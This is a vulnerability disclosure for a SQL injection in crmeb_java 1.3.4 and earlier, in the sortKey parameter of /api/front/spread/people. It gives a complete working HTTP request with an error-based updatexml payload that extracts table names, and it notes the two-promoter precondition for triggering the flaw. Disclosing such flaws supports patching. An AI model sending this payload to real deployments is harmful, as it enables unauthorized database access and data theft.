There is a sql injection vulnerability in the crmeb_java system /api/front/spread/people

[Tyaoo]

[Suggested description] There is a SQL Injection vulnerability in crmeb_java <=1.3.4, caused by the param sortKey which is in ${} format and isn't strictly filtered.

[Vulnerability Type] SQLi

[Vendor of Product] https://github.com/crmeb/crmeb_java

[Affected Product Code Base] <=1.3.4

[Affected Component] /api/front/spread/people

[Attack Type] Remote

[Vulnerability details] Make sure the user has at least two promoters. Send the crafted request package to the api interface /api/front/spread/people

GET /api/front/spread/people?sortKey=updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase()),0x7e),1) HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
content-type: application/json
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Origin: http://localhost:8082
Connection: close
Referer: http://localhost:8082/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

[Impact Code execution] true [Cause of vulnerability] The interface /spread/people call the function getSpreadPeopleList Make sure the user has secondary promoter, the it will call the function getSpreadPeopleList. There is a trick that the order by statement is only executed if there are at least two promoters. The param sortKey is ${} format and it will be joined to the sql string directly. That's all, thanks.